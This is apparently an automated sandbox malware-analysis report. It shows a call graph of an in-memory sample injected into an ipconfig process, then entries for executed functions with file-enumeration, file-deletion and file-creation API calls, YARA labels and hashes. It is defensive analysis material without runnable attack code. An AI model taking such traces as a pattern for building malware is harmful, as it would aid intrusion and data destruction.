27867->27868 27901 75c5f0 27867->27901 27951 75e570 27867->27951 27955 75dfd0 27867->27955 27868->27867 27869->27360 27870->27371 27871->27379 27872->27829 27874 75e2b0 27873->27874 27875 75e1fa 27873->27875 27874->27836 27874->27837 27876 75b4c0 LdrLoadDll 27875->27876 27877 75e21c 27876->27877 27883 76c360 27877->27883 27879 75e25e 27886 76c3a0 27879->27886 27882 76c8b0 2 API calls 27882->27874 27884 76d3f0 LdrLoadDll 27883->27884 27885 76c37c 27884->27885 27885->27879 27887 76c3bc 27886->27887 27888 76d3f0 LdrLoadDll 27886->27888 27891 3309fe0 LdrInitializeThunk 27887->27891 27888->27887 27889 75e2a4 27889->27882 27891->27889 27893 75e5dd 27892->27893 27894 7677c0 LdrLoadDll 27893->27894 27895 75e5f5 27894->27895 27896 75e603 27895->27896 27897 75e5fc SetErrorMode 27895->27897 27896->27857 27897->27896 27969 75e3a0 27898->27969 27900 766d06 27900->27861 27902 75c60f 27901->27902 27903 75c609 27901->27903 27995 759be0 27902->27995 27988 75dcc0 27903->27988 27906 75c61c 27907 75c89b 27906->27907 27908 76f5d0 2 API calls 27906->27908 27907->27867 27909 75c638 27908->27909 27910 75c64c 27909->27910 27911 75e570 2 API calls 27909->27911 28004 76c130 27910->28004 27911->27910 27914 75c776 28011 75c590 LdrLoadDll LdrInitializeThunk 27914->28011 27915 76c320 2 API calls 27916 75c6ca 27915->27916 27916->27914 27921 75c6d6 27916->27921 27918 75c795 27919 75c79d 27918->27919 28012 75c500 LdrLoadDll NtClose LdrInitializeThunk 27918->28012 27923 76c8b0 2 API calls 27919->27923 27921->27907 27922 75c71f 27921->27922 27926 76c430 2 API calls 27921->27926 27924 76c8b0 2 API calls 27922->27924 27927 75c7a7 27923->27927 27928 75c73c 27924->27928 27925 75c7bf 27925->27919 27929 75c7c6 27925->27929 27926->27922 27927->27867 28007 76b790 27928->28007 27931 75c7de 27929->27931 28013 75c480 LdrLoadDll LdrInitializeThunk 27929->28013 28014 76c1b0 LdrLoadDll 27931->28014 27932 75c753 27932->27907 28010 757af0 LdrLoadDll 27932->28010 27935 75c7f2 28015 75c2e0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27935->28015 27938 75c76c 27938->27867 27939 75c816 27940 75c857 27939->27940 28016 76c1e0 LdrLoadDll 27939->28016 28018 76c240 LdrLoadDll 27940->28018 27943 75c865 27945 76c8b0 2 API calls 27943->27945 27944 75c834 27944->27940 28017 76c270 LdrLoadDll 27944->28017 27946 75c86f 27945->27946 27948 76c8b0 2 API calls 27946->27948 27949 75c879 27948->27949 27949->27907 28019 757af0 LdrLoadDll 27949->28019 27952 75e583 27951->27952 28041 76c2b0 27952->28041 27956 75dfdf 27955->27956 27957 75e00a 27956->27957 28047 75de00 27956->28047 27960 75e049 27957->27960 28067 75dc40 27957->28067 27962 75e078 27960->27962 28089 75d5f0 11 API calls 27960->28089 27963 75e09e 27962->27963 28090 76aec0 10 API calls 27962->28090 27963->27867 27968 7673b0 9 API calls 27968->27960 27970 75e3bd 27969->27970 27976 76c3e0 27970->27976 27972 75e405 27972->27900 27977 76d3f0 LdrLoadDll 27976->27977 27978 76c3fc 27977->27978 27986 33099a0 LdrInitializeThunk 27978->27986 27979 75e3fe 27979->27972 27981 76c430 27979->27981 27982 76d3f0 LdrLoadDll 27981->27982 27983 76c44c 27982->27983 27987 3309780 LdrInitializeThunk 27983->27987 27984 75e42e 27984->27900 27986->27979 27987->27984 28020 75d670 27988->28020 27990 75dde2 27991 76e400 LdrLoadDll 27990->27991 27992 75ddf1 27991->27992 27992->27902 27993 75dcde 27993->27990 28029 76b610 27993->28029 27996 759bfb 27995->27996 27997 75e1e0 3 API calls 27996->27997 28003 759d1b 27996->28003 27998 759cfc 27997->27998 27999 759d2a 27998->27999 28000 759d11 27998->28000 28001 76c8b0 2 API calls 27998->28001 27999->27906 28040 756cb0 LdrLoadDll 28000->28040 28001->28000 28003->27906 28005 76d3f0 LdrLoadDll 28004->28005 28006 75c6a0 28005->28006 28006->27907 28006->27914 28006->27915 28008 75e570 2 API calls 28007->28008 28009 76b7c2 28008->28009 28009->27932 28010->27938 28011->27918 28012->27925 28013->27931 28014->27935 28015->27939 28016->27944 28017->27940 28018->27943 28019->27907 28021 75d6a3 28020->28021 28035 75b7b0 28021->28035 28023 75d6b5 28024 75e3a0 3 API calls 28023->28024 28025 75d6f8 28024->28025 28026 75d6ff 28025->28026 28039 76e440 LdrLoadDll 28025->28039 28026->27993 28028 75d70f 28028->27993 28030 76b61f 28029->28030 28031 7677c0 LdrLoadDll 28030->28031 28032 76b637 28031->28032 28033 76b65d 28032->28033 28034 76b64a CreateThread 28032->28034 28033->27990 28034->27990 28036 75b7d7 28035->28036 28037 75b4c0 LdrLoadDll 28036->28037 28038 75b813 28037->28038 28038->28023 28039->28028 28040->28003 28042 76d3f0 LdrLoadDll 28041->28042 28043 76c2cc 28042->28043 28046 3309840 LdrInitializeThunk 28043->28046 28044 75e5ae 28044->27867 28046->28044 28048 75de30 28047->28048 28091 7666d0 28048->28091 28050 75de81 28120 765580 28050->28120 28052 75de87 28154 7623a0 28052->28154 28054 75de8d 28185 764600 28054->28185 28060 75dea1 28229 765df0 28060->28229 28062 75dea7 28253 75fce0 28062->28253 28064 75debf 28268 760f80 28064->28268 28068 75dc58 28067->28068 28072 75dcaf 28067->28072 28069 7611c0 9 API calls 28068->28069 28068->28072 28070 75dc99 28069->28070 28070->28072 28537 761410 11 API calls 28070->28537 28072->27963 28073 75da80 28072->28073 28074 75da9c 28073->28074 28088 75db7b 28073->28088 28076 76c8b0 2 API calls 28074->28076 28074->28088 28075 75dc0b 28077 75dc25 28075->28077 28079 7673b0 9 API calls 28075->28079 28078 75dab7 28076->28078 28077->27960 28077->27968 28538 75cf70 LdrLoadDll NtClose LdrInitializeThunk 28078->28538 28079->28077 28081 75dbe8 28081->28075 28540 75d140 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 28081->28540 28083 75daef 28085 75b4c0 LdrLoadDll 28083->28085 28086 75db00 28085->28086 28087 75b4c0 LdrLoadDll 28086->28087 28087->28088 28088->28075 28539 75cf70 LdrLoadDll NtClose LdrInitializeThunk 28088->28539 28089->27962 28090->27963 28092 7666f8 28091->28092 28093 75b4c0 LdrLoadDll 28092->28093 28094 76670c 28093->28094 28095 75cd30 3 API calls 28094->28095 28097 76673f 28095->28097 28096 766746 28096->28050 28097->28096 28098 75b4c0 LdrLoadDll 28097->28098 28099 76676e 28098->28099 28100 75b4c0 LdrLoadDll 28099->28100 28101 766792 28100->28101 28273 75cdf0 28101->28273 28103 7667f8 28105 75b4c0 LdrLoadDll 28103->28105 28104 7667b6 28104->28103 28117 76697b 28104->28117 28277 766420 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 28104->28277 28106 766818 28105->28106 28108 75cdf0 2 API calls 28106->28108 28111 76683c 28108->28111 28109 766882 28110 75cdf0 2 API calls 28109->28110 28114 7668b2 28110->28114 28111->28109 28111->28117 28278 766420 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 28111->28278 28113 7668f8 28116 75cdf0 2 API calls 28113->28116 28114->28113 28114->28117 28279 766420 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 28114->28279 28119 766957 28116->28119 28117->28050 28119->28117 28280 766420 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 28119->28280 28121 7655e4 28120->28121 28122 75b4c0 LdrLoadDll 28121->28122 28123 7656b1 28122->28123 28124 75cd30 3 API calls 28123->28124 28126 7656e4 28124->28126 28125 7656eb 28125->28052 28126->28125 28127 75b4c0 LdrLoadDll 28126->28127 28128 765713 28127->28128 28129 75cdf0 2 API calls 28128->28129 28130 765753 28129->28130 28131 765882 28130->28131 28152 765873 28130->28152 28287 765370 28130->28287 28132 76c8b0 2 API calls 28131->28132 28134 76588c 28132->28134 28134->28052 28135 765788 28135->28131 28136 765793 28135->28136 28137 76e400 LdrLoadDll 28136->28137 28138 7657bc 28137->28138 28139 7657c5 28138->28139 28140 7657db 28138->28140 28141 76c8b0 2 API calls 28139->28141 28316 765260 CoInitialize 28140->28316 28143 7657cf 28141->28143 28143->28052 28144 7657e9 28318 76c5c0 28144->28318 28146 765862 28147 76c8b0 2 API calls 28146->28147 28149 76586c 28147->28149 28151 76e320 2 API calls 28149->28151 28150 765807 28150->28146 28153 76c5c0 LdrLoadDll 28150->28153 28321 765190 LdrLoadDll RtlFreeHeap 28150->28321 28151->28152 28152->28052 28153->28150 28155 7623c8 28154->28155 28156 76e400 LdrLoadDll 28155->28156 28158 762428 28156->28158 28157 762431 28157->28054 28158->28157 28322 761800 28158->28322 28160 76245a 28161 76247a 28160->28161 28352 761b10 LdrLoadDll 28160->28352 28162 762498 28161->28162 28354 764100 10 API calls 28161->28354 28170 7624b2 28162->28170 28356 75b2c0 LdrLoadDll 28162->28356 28165 762468 28165->28161 28353 762120 9 API calls 28165->28353 28166 76248c 28355 764100 10 API calls 28166->28355 28171 761800 10 API calls 28170->28171 28172 7624df 28171->28172 28183 762500 28172->28183 28357 761b10 LdrLoadDll 28172->28357 28174 762538 28178 76e320 2 API calls 28174->28178 28175 7624ee 28175->28183 28358 762120 9 API calls 28175->28358 28180 762542 28178->28180 28179 762512 28360 764100 10 API calls 28179->28360 28180->28054 28184 76251e 28183->28184 28359 764100 10 API calls 28183->28359 28184->28174 28361 75b2c0 LdrLoadDll 28184->28361 28186 764626 28185->28186 28187 75b4c0 LdrLoadDll 28186->28187 28188 764655 28187->28188 28189 75b4c0 LdrLoadDll 28188->28189 28190 764681 28188->28190 28189->28190 28377 75e7d0 28190->28377 28192 764765 28193 75de95 28192->28193 28382 764310 28192->28382 28195 7658a0 28193->28195 28196 764600 10 API calls 28195->28196 28197 75de9b 28196->28197 28198 763320 28197->28198 28199 763342 28198->28199 28200 75b4c0 LdrLoadDll 28199->28200 28201 76350d 28200->28201 28202 75b4c0 LdrLoadDll 28201->28202 28203 76351e 28202->28203 28204 75b390 LdrLoadDll 28203->28204 28205 763535 28204->28205 28462 7631e0 28205->28462 28208 7631e0 12 API calls 28209 7635a8 28208->28209 28210 7631e0 12 API calls 28209->28210 28211 7635c0 28210->28211 28212 7631e0 12 API calls 28211->28212 28213 7635d8 28212->28213 28214 7631e0 12 API calls 28213->28214 28215 7635f0 28214->28215 28216 7631e0 12 API calls 28215->28216 28218 76360b 28216->28218 28217 763625 28217->28060 28218->28217 28219 7631e0 12 API calls 28218->28219 28220 763659 28219->28220 28221 7631e0 12 API calls 28220->28221 28222 763696 28221->28222 28223 7631e0 12 API calls 28222->28223 28224 7636d3 28223->28224 28225 7631e0 12 API calls 28224->28225 28226 763710 28225->28226 28227 7631e0 12 API calls 28226->28227 28228 76374d 28227->28228 28228->28060 28230 765e0d 28229->28230 28231 75b170 LdrLoadDll 28230->28231 28232 765e28 28231->28232 28233 7677c0 LdrLoadDll 28232->28233 28250 76602c 28232->28250 28234 765e58 28233->28234 28235 7677c0 LdrLoadDll 28234->28235 28236 765e71 28235->28236 28237 7677c0 LdrLoadDll 28236->28237 28238 765e8a 28237->28238 28239 7677c0 LdrLoadDll 28238->28239 28240 765ea6 28239->28240 28241 7677c0 LdrLoadDll 28240->28241 28242 765ebf 28241->28242 28243 7677c0 LdrLoadDll 28242->28243 28244 765ed8 28243->28244 28245 7677c0 LdrLoadDll 28244->28245 28246 765ef4 28245->28246 28247 7677c0 LdrLoadDll 28246->28247 28248 765f0d 28247->28248 28249 7677c0 LdrLoadDll 28248->28249 28251 765f25 28249->28251 28250->28062 28251->28250 28477 7659e0 LdrLoadDll 28251->28477 28254 75fcf6 28253->28254 28264 75fd01 28253->28264 28255 76e400 LdrLoadDll 28254->28255 28255->28264 28256 75fd17 28256->28064 28257 7677c0 LdrLoadDll 28257->28264 28258 75fdfc GetFileAttributesW 28258->28264 28259 75ff7f 28260 75ff98 28259->28260 28261 76e320 2 API calls 28259->28261 28260->28064 28261->28260 28263 75b4c0 LdrLoadDll 28263->28264 28264->28256 28264->28257 28264->28258 28264->28259 28264->28263 28265 763760 9 API calls 28264->28265 28478 76aab0 28264->28478 28482 76a940 9 API calls 28264->28482 28483 76a7e0 9 API calls 28264->28483 28265->28264 28484 760d00 28268->28484 28270 760f8d 28505 7609e0 28270->28505 28272 75ded1 28272->27957 28274 75ce15 28273->28274 28281 76c4b0 28274->28281 28277->28103 28278->28109 28279->28113 28280->28117 28282 76d3f0 LdrLoadDll 28281->28282 28283 76c4cc 28282->28283 28286 33096d0 LdrInitializeThunk 28283->28286 28284 75ce89 28284->28104 28286->28284 28288 76538c 28287->28288 28289 75b170 LdrLoadDll 28288->28289 28291 7653a7 28289->28291 28290 7653b0 28290->28135 28291->28290 28292 7677c0 LdrLoadDll 28291->28292 28293 7653cd 28292->28293 28294 7677c0 LdrLoadDll 28293->28294 28295 7653e8 28294->28295 28296 7677c0 LdrLoadDll 28295->28296 28297 765401 28296->28297 28298 7677c0 LdrLoadDll 28297->28298 28299 76541d 28298->28299 28300 7677c0 LdrLoadDll 28299->28300 28301 765436 28300->28301 28302 7677c0 LdrLoadDll 28301->28302 28303 76544f 28302->28303 28304 75b170 LdrLoadDll 28303->28304 28306 76547b 28304->28306 28305 765529 28305->28135 28306->28305 28307 7677c0 LdrLoadDll 28306->28307 28308 76549f 28307->28308 28309 75b170 LdrLoadDll 28308->28309 28310 7654d4 28309->28310 28310->28305 28311 7677c0 LdrLoadDll 28310->28311 28312 7654f7 28311->28312 28313 7677c0 LdrLoadDll 28312->28313 28314 765510 28313->28314 28315 7677c0 LdrLoadDll 28314->28315 28315->28305 28317 7652c5 28316->28317 28317->28144 28319 76d3f0 LdrLoadDll 28318->28319 28320 76c5dc 28319->28320 28320->28150 28321->28150 28323 761898 28322->28323 28324 75b4c0 LdrLoadDll 28323->28324 28325 761936 28324->28325 28326 75b4c0 LdrLoadDll 28325->28326 28327 761951 28326->28327 28328 75cdf0 2 API calls 28327->28328 28329 761976 28328->28329 28330 761abd 28329->28330 28374 76c540 LdrLoadDll 28329->28374 28331 761ace 28330->28331 28362 7611c0 28330->28362 28331->28160 28334 7619a4 28335 761ab3 28334->28335 28337 7619af 28334->28337 28336 76c8b0 2 API calls 28335->28336 28336->28330 28338 76c8b0 2 API calls 28337->28338 28339 7619e9 28338->28339 28375 76e4e0 LdrLoadDll 28339->28375 28341 761a1f 28341->28331 28342 75cdf0 2 API calls 28341->28342 28343 761a45 28342->28343 28343->28331 28376 76c540 LdrLoadDll 28343->28376 28345 761a6a 28346 761a71 28345->28346 28347 761a9d 28345->28347 28349 76c8b0 2 API calls 28346->28349 28348 76c8b0 2 API calls 28347->28348 28350 761aa7 28348->28350 28351 761a7b 28349->28351 28350->28160 28351->28160 28352->28165 28353->28161 28354->28166 28355->28162 28356->28170 28357->28175 28358->28183 28359->28179 28360->28184 28361->28174 28363 7611e5 28362->28363 28364 75b4c0 LdrLoadDll 28363->28364 28365 7612a0 28364->28365 28366 75b4c0 LdrLoadDll 28365->28366 28367 7612c4 28366->28367 28368 7673b0 9 API calls 28367->28368 28370 761317 28368->28370 28369 7613d1 28369->28331 28370->28369 28371 75b4c0 LdrLoadDll 28370->28371 28372 76137e 28371->28372 28373 7673b0 9 API calls 28372->28373 28373->28369 28374->28334 28375->28341 28376->28345 28378 7677c0 LdrLoadDll 28377->28378 28379 75e7ef 28378->28379 28380 75e7f6 GetFileAttributesW 28379->28380 28381 75e801 28379->28381 28380->28381 28381->28192 28406 76ac10 28382->28406 28384 76437b 28384->28192 28385 764326 28385->28384 28386 764387 28385->28386 28387 764345 28385->28387 28388 75b4c0 LdrLoadDll 28386->28388 28389 76434d 28387->28389 28390 76436a 28387->28390 28393 764398 28388->28393 28391 76e320 2 API calls 28389->28391 28392 76e320 2 API calls 28390->28392 28394 76435e 28391->28394 28392->28384 28395 7673b0 9 API calls 28393->28395 28394->28192 28396 7643af 28395->28396 28446 763760 28396->28446 28398 7643ba 28402 7644b8 28398->28402 28403 7643d2 28398->28403 28399 76449f 28400 76e320 2 API calls 28399->28400 28401 7645c3 28400->28401 28401->28192 28402->28399 28457 763cf0 9 API calls 28402->28457 28403->28399 28456 763cf0 9 API calls 28403->28456 28407 76ac1e 28406->28407 28408 76ac25 28406->28408 28407->28385 28409 75b170 LdrLoadDll 28408->28409 28410 76ac57 28409->28410 28411 76ac66 28410->28411 28458 76a700 LdrLoadDll 28410->28458 28413 76e400 LdrLoadDll 28411->28413 28432 76ae49 28411->28432 28414 76ac7f 28413->28414 28415 76ac94 28414->28415 28416 76adf8 28414->28416 28414->28432 28459 763840 LdrLoadDll 28415->28459 28417 76ae02 28416->28417 28418 76ae9b 28416->28418 28460 763840 LdrLoadDll 28417->28460 28421 76e320 2 API calls 28418->28421 28421->28432 28422 76acab 28425 7677c0 LdrLoadDll 28422->28425 28423 76ae19 28461 76a030 LdrLoadDll 28423->28461 28427 76acc7 28425->28427 28426 76ae2f 28428 7677c0 LdrLoadDll 28426->28428 28429 7677c0 LdrLoadDll 28427->28429 28428->28432 28430 76ace3 28429->28430 28431 7677c0 LdrLoadDll 28430->28431 28433 76ad02 28431->28433 28432->28385 28434 7677c0 LdrLoadDll 28433->28434 28435 76ad1e 28434->28435 28436 7677c0 LdrLoadDll 28435->28436 28437 76ad3a 28436->28437 28438 7677c0 LdrLoadDll 28437->28438 28439 76ad59 28438->28439 28440 7677c0 LdrLoadDll 28439->28440 28441 76ad75 28440->28441 28442 7677c0 LdrLoadDll 28441->28442 28443 76ad98 28442->28443 28443->28432 28444 76e320 2 API calls 28443->28444 28445 76adec 28444->28445 28445->28385 28447 7673b0 9 API calls 28446->28447 28448 763776 28447->28448 28449 763783 28448->28449 28450 7673b0 9 API calls 28448->28450 28449->28398 28451 763794 28450->28451 28451->28449 28452 7673b0 9 API calls 28451->28452 28453 7637af 28452->28453 28454 76e320 2 API calls 28453->28454 28455 7637bc 28454->28455 28455->28398 28456->28403 28457->28402 28458->28411 28459->28422 28460->28423 28461->28426 28463 763209 28462->28463 28464 7677c0 LdrLoadDll 28463->28464 28465 763246 28464->28465 28466 7677c0 LdrLoadDll 28465->28466 28467 763264 28466->28467 28468 7677c0 LdrLoadDll 28467->28468 28470 763286 28468->28470 28469 76330c 28469->28208 28470->28469 28471 7632b0 FindFirstFileW 28470->28471 28471->28469 28475 7632cb 28471->28475 28472 7632f3 FindNextFileW 28474 763305 FindClose 28472->28474 28472->28475 28474->28469 28475->28472 28476 7630c0 12 API calls 28475->28476 28476->28475 28477->28251 28479 76aac6 28478->28479 28481 76abc6 28478->28481 28480 7673b0 9 API calls 28479->28480 28479->28481 28480->28479 28481->28264 28482->28264 28483->28264 28485 760d25 28484->28485 28486 75b4c0 LdrLoadDll 28485->28486 28487 760d8a 28486->28487 28488 75b4c0 LdrLoadDll 28487->28488 28489 760dd8 28488->28489 28490 75e7d0 2 API calls 28489->28490 28491 760e1f 28490->28491 28492 760e26 28491->28492 28493 76ac10 2 API calls 28491->28493 28492->28270 28495 760e34 28493->28495 28494 760e3d 28494->28270 28495->28494 28496 75b4c0 LdrLoadDll 28495->28496 28498 760e8c 28496->28498 28497 76aab0 9 API calls 28497->28498 28498->28497 28500 760f11 28498->28500 28518 760440 28498->28518 28501 760f69 28500->28501 28529 7607a0 28500->28529 28503 76e320 2 API calls 28501->28503 28504 760f70 28503->28504 28504->28270 28506 7609f6 28505->28506 28516 760a01 28505->28516 28507 76e400 LdrLoadDll 28506->28507 28507->28516 28508 760a17 28508->28272 28509 75e7d0 2 API calls 28509->28516 28510 760cd0 28511 760ce9 28510->28511 28512 76e320 2 API calls 28510->28512 28511->28272 28512->28511 28513 76aab0 9 API calls 28513->28516 28514 760440 9 API calls 28514->28516 28515 75b4c0 LdrLoadDll 28515->28516 28516->28508 28516->28509 28516->28510 28516->28513 28516->28514 28516->28515 28517 7607a0 9 API calls 28516->28517 28517->28516 28519 760466 28518->28519 28520 7673b0 9 API calls 28519->28520 28521 7604c2 28520->28521 28522 763760 9 API calls 28521->28522 28523 7604cd 28522->28523 28525 760650 28523->28525 28527 7604eb 28523->28527 28524 760635 28524->28498 28525->28524 28536 760310 9 API calls 28525->28536 28527->28524 28535 760310 9 API calls 28527->28535 28530 7607c6 28529->28530 28531 7673b0 9 API calls 28530->28531 28532 760837 28531->28532 28533 763760 9 API calls 28532->28533 28534 760842 28533->28534 28534->28500 28535->28527 28536->28525 28537->28072 28538->28083 28539->28081 28540->28075 28541 75ebdf 28542 75ebe9 28541->28542 28543 7673b0 9 API calls 28542->28543 28544 75ebcf 28543->28544

                                                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                                                            Function 007631E0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 007632C1
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 007632FE
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNELBASE(?), ref: 00763309
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4672d82ca8599100e714f66b385653927482b863040f89dd52cb7f893fb28c9c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0db03b49652884f33c9e3b78d2b5b16810ead0254726a219445562f24f62313f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4672d82ca8599100e714f66b385653927482b863040f89dd52cb7f893fb28c9c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A3163B1900249BBEB20DB65CC85FEF777CEB44705F144558BD09AB181EA74AA84CBA0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076C87A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24filenativeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtDeleteFile.NTDLL(tv,00000002,?,007674E2,00000000,00000018,?,?,7BE2EBFA,00000000,?), ref: 0076C8A5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                                                                                                                            • String ID: tv
                                                                                                                                                                                                                                                                                                                            • API String ID: 4033686569-369425511
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9f52508f4c70eb143d3712f1b8d448fe934e6570dfc74a44783cdb3025ab0534
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2c7a551c5f2474307ff99a8ecad9a5530bf0148cccf4c7475b720414d07e63fa
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f52508f4c70eb143d3712f1b8d448fe934e6570dfc74a44783cdb3025ab0534
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1E08C72640214ABCA10ABA89C49EC73B68DB48710F018460FA1D5B642C634EA0287E1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076C8B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtClose.NTDLL(Uu,00000000,?,0075E555,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0076C8D5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                                                                            • String ID: Uu
                                                                                                                                                                                                                                                                                                                            • API String ID: 3535843008-130747043
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7eafef2d6970b6d318ec0e9e92351f1a00d71cb6c752104f69176de89644708e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66D01772600218ABDA20EBA9DC89FDB7BACDF48660F018455BE1D5B242C530FA0086E1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076C880 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20filenativeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtDeleteFile.NTDLL(tv,00000002,?,007674E2,00000000,00000018,?,?,7BE2EBFA,00000000,?), ref: 0076C8A5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                                                                                                                            • String ID: tv
                                                                                                                                                                                                                                                                                                                            • API String ID: 4033686569-369425511
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f02f377ea2274c69b7c86e9a960f0d37badebde59b70fe3a7f14ee5c134ccb2e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7D01772640218ABDA20EB99DC89FD77BACDF48760F018455BE1D5B242C634FA0087E1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076C780 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,?,0076751C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0076751C,?,00000000,00000060,00000000,00000000), ref: 0076C7CD
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3dba05091f537d97eed3211b3e0952e8b6e7fc648b0e7f2e524789d7cdf1c99f
